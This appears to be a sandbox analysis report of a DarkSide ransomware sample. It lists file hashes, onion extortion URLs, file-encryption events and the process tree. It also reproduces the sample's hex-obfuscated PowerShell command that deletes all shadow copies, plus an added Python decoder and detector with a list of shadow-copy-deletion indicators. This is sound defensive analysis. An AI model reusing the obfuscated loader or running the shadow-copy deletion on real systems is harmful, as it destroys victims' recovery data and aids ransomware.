Analysis
- max time kernel: 97s
- max time network: 99s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 11-05-2021 04:25
Static task: static1
Behavioral task: behavioral1
- Sample: 1.exe
- Resource: win7v20210408
Behavioral task: behavioral2
- Sample: 1.exe
- Resource: win10v20210410
General
- Target: 1.exe
- Size: 41KB
- MD5: a14e07f7da701bd91108f988862a71a0
- SHA1: bcbe67c6518e68d4056f10fe9191d2900d06190f
- SHA256: bc32a2ccf158ebe2b76646be865a4c6dd91da6b8e5bb0dd9520102a9bfea5439
- SHA512: 06df2cd0ff26e8452cf139751f498db63d04a85f59a6ccf2e308c8c830fdd15c2dcdee9697e61a22da58c932e6f9440a134f1e6fff3d42d87f0ce97bf4a85442
Malware Config
Extracted
- Ransom note path: C:\README.efaa031a.TXT
- Family: darkside
- URL: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
- URL: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
Signatures
- DarkSide
  Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
- Modifies extensions of user files (8 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Process: 1.exe
  File opened for modification  C:\Users\Admin\Pictures\ExpandSubmit.tif.efaa031a
  File renamed                  C:\Users\Admin\Pictures\SelectLock.png => C:\Users\Admin\Pictures\SelectLock.png.efaa031a
  File opened for modification  C:\Users\Admin\Pictures\SelectLock.png.efaa031a
  File renamed                  C:\Users\Admin\Pictures\UpdateDisable.tif => C:\Users\Admin\Pictures\UpdateDisable.tif.efaa031a
  File opened for modification  C:\Users\Admin\Pictures\UpdateDisable.tif.efaa031a
  File renamed                  C:\Users\Admin\Pictures\EnterTest.tif => C:\Users\Admin\Pictures\EnterTest.tif.efaa031a
  File opened for modification  C:\Users\Admin\Pictures\EnterTest.tif.efaa031a
  File renamed                  C:\Users\Admin\Pictures\ExpandSubmit.tif => C:\Users\Admin\Pictures\ExpandSubmit.tif.efaa031a
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes:
  1.exe (PID 340): 3 events
  powershell.exe (PID 1612): 2 events
- Suspicious use of AdjustPrivilegeToken (24 IoCs)
  Processes:
  1.exe (PID 340): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  powershell.exe (PID 1612): SeDebugPrivilege
  vssvc.exe (PID 636): SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes:
  PID 340 (1.exe) wrote to memory of PID 1612 (powershell.exe), recorded 4 times
Processes
- C:\Users\Admin\AppData\Local\Temp\1.exe (PID 340)
  Command line: "C:\Users\Admin\AppData\Local\Temp\1.exe"
  - Modifies extensions of user files
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1612)
    Command line: powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
    -ep bypass sets the execution policy to Bypass; the loop rebuilds a string one byte at a time from the hex literal (62 bytes, indices 0..61) and hands it to iex (Invoke-Expression). The hex decodes to:
    Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
    i.e. every Volume Shadow Copy is deleted through WMI, removing the snapshots a victim could otherwise use to restore encrypted files.
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe (PID 636, Volume Shadow Copy service)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
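The PowerShell one-liner above is a minimal loader: the payload only exists as a hex literal until runtime, so a string match on the raw command line never sees "Win32_Shadowcopy". The Python below is an added example written for this page, not part of the sandbox report or of the sample. It emulates the (0..N)|%{...Substring(2*$_,2)} loop on the recorded command line (copied verbatim as constructed input), then scans the decoded text for shadow-copy deletion indicators. The vssadmin and wmic indicator strings and the mapping to ATT&CK T1490 (Inhibit System Recovery) are my annotations; this report shows only the WMI form.

```python
import re
from typing import Optional

# Constructed test input: the command line from the process tree above, verbatim.
HEX_BLOB = (
    "4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20"
    "466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20"
)
SAMPLE_CMDLINE = (
    "powershell -ep bypass -c \"(0..61)|%{$s+=[char][byte]('0x'+'"
    + HEX_BLOB
    + "'.Substring(2*$_,2))};iex $s\""
)

# Matches exactly the loader shape seen here:
#   (0..N)|%{ ... '0x'+'<hex>'.Substring(2*$_,2) ... }
HEX_LOADER = re.compile(
    r"\(0\.\.(?P<count>\d+)\)\|%\{.*?'0x'\+'(?P<hex>[0-9A-Fa-f]+)'\.Substring\(2\*\$_,2\)",
    re.DOTALL,
)

# Indicators of shadow-copy deletion (lower-cased, whitespace-normalised).
# Only the WMI class appears in this report; the other two are my additions.
SHADOW_COPY_DELETION = (
    "win32_shadowcopy",
    "vssadmin delete shadows",
    "wmic shadowcopy delete",
)


def decode_hex_loader(cmdline: str) -> Optional[str]:
    """Emulate the loop: for i in 0..N take hex chars 2i..2i+1 and cast to a char."""
    m = HEX_LOADER.search(cmdline)
    if not m:
        return None
    iterations = int(m.group("count")) + 1   # (0..61) is inclusive: 62 iterations
    hexstr = m.group("hex")
    chars = []
    for i in range(iterations):
        pair = hexstr[2 * i : 2 * i + 2]
        if len(pair) < 2:                     # loop would run past the literal
            break
        chars.append(chr(int(pair, 16)))
    return "".join(chars)


def flags_shadow_copy_deletion(text: str) -> bool:
    """True if any deletion indicator appears in the (normalised) text."""
    s = " ".join(text.lower().split())
    return any(ind in s for ind in SHADOW_COPY_DELETION)


def analyse(cmdline: str) -> dict:
    """Decode the loader if present and report what the command actually does."""
    decoded = decode_hex_loader(cmdline)
    hit = flags_shadow_copy_deletion(cmdline) or (
        decoded is not None and flags_shadow_copy_deletion(decoded)
    )
    return {
        "exec_policy_bypass": bool(
            re.search(r"-e(xecutionpolicy|p)\s+bypass", cmdline, re.I)
        ),
        "hex_loader": decoded is not None,
        "decoded": decoded,
        "shadow_copy_deletion": hit,
        "attack_techniques": ["T1490"] if hit else [],   # my mapping, see lead-in
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

The point of the two-stage check: flags_shadow_copy_deletion(SAMPLE_CMDLINE) is False on the raw command line, because the only thing visible there is hex; only after decode_hex_loader reproduces what iex will execute does the Win32_Shadowcopy indicator fire. Detection rules that key on the literal strings therefore need to run after the same deobfuscation the attacker's loader performs, or on the script block that PowerShell logs at execution time.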
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  MD5: 7ec36b60a53214762d5db00dc3fc6688
  SHA1: bbc9b66763a203adcf4fa703b8acf6e7518f0675
  SHA256: 6821512af5e48dd3379731ddd4eea396c23b114194a2129118b25224b0d45091
  SHA512: c7fa5995b6236d716cdaeaa3733dee0259854329fc35738e4e4176ee16bb2e222d25ce644a705755c95c73bed250736b2eb550cc8cf00187c7dcf59651ae7183
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 60f82d899c5d7a8dc3eb04fbf485bfe7
  SHA1: 16b1f8274eaa2f6c33646917ecd1edda0db58f4d
  SHA256: 265085e41f844ba81b6896c47b861061027d4b4f1be2fc22cbebeb52954cff03
  SHA512: 0e640f555b35350c9d9771e00e61ca530671e766eceb2802af0ce5f813c200a952d686fd8118c3505bd08068e222f572014991254408eb8e5f4471d2117d0e23
Memory dumps
- memory/340-59-0x00000000750C1000-0x00000000750C3000-memory.dmp (8KB)
- memory/1612-66-0x000000001AC34000-0x000000001AC36000-memory.dmp (8KB)
- memory/1612-63-0x000000001ACB0000-0x000000001ACB1000-memory.dmp (4KB)
- memory/1612-64-0x0000000002070000-0x0000000002071000-memory.dmp (4KB)
- memory/1612-62-0x0000000001DC0000-0x0000000001DC1000-memory.dmp (4KB)
- memory/1612-65-0x000000001AC30000-0x000000001AC32000-memory.dmp (8KB)
- memory/1612-67-0x00000000024F0000-0x00000000024F1000-memory.dmp (4KB)
- memory/1612-68-0x000000001C3C0000-0x000000001C3C1000-memory.dmp (4KB)
- memory/1612-69-0x000000001C580000-0x000000001C581000-memory.dmp (4KB)
- memory/1612-61-0x000007FEFB701000-0x000007FEFB703000-memory.dmp (8KB)
- memory/1612-60-0x0000000000000000-mapping.dmp